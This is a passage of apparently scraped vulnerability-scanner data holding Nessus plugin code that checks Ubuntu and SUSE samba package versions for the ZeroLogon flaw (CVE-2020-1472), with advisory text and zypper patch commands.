'2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'smbclient', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '16.04', 'pkgname': 'winbind', 'pkgver': '2:4.3.11+dfsg-0ubuntu0.16.04.30'},\n {'osver': '18.04', 'pkgname': 'ctdb', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libnss-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libpam-winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'python-samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-common', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'smbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ctdb / libnss-winbind / libpam-winbind / libparse-pidl-perl / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:12", "description": "This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2720-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2720-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143655);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non\ndefault configurations when an attacker established a vulnerable\nNetlogon secure channel connection to a domain controller, using the\nNetlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202720-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b504ef0\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise High Availability 12-SP5 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP5-2020-2720=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", 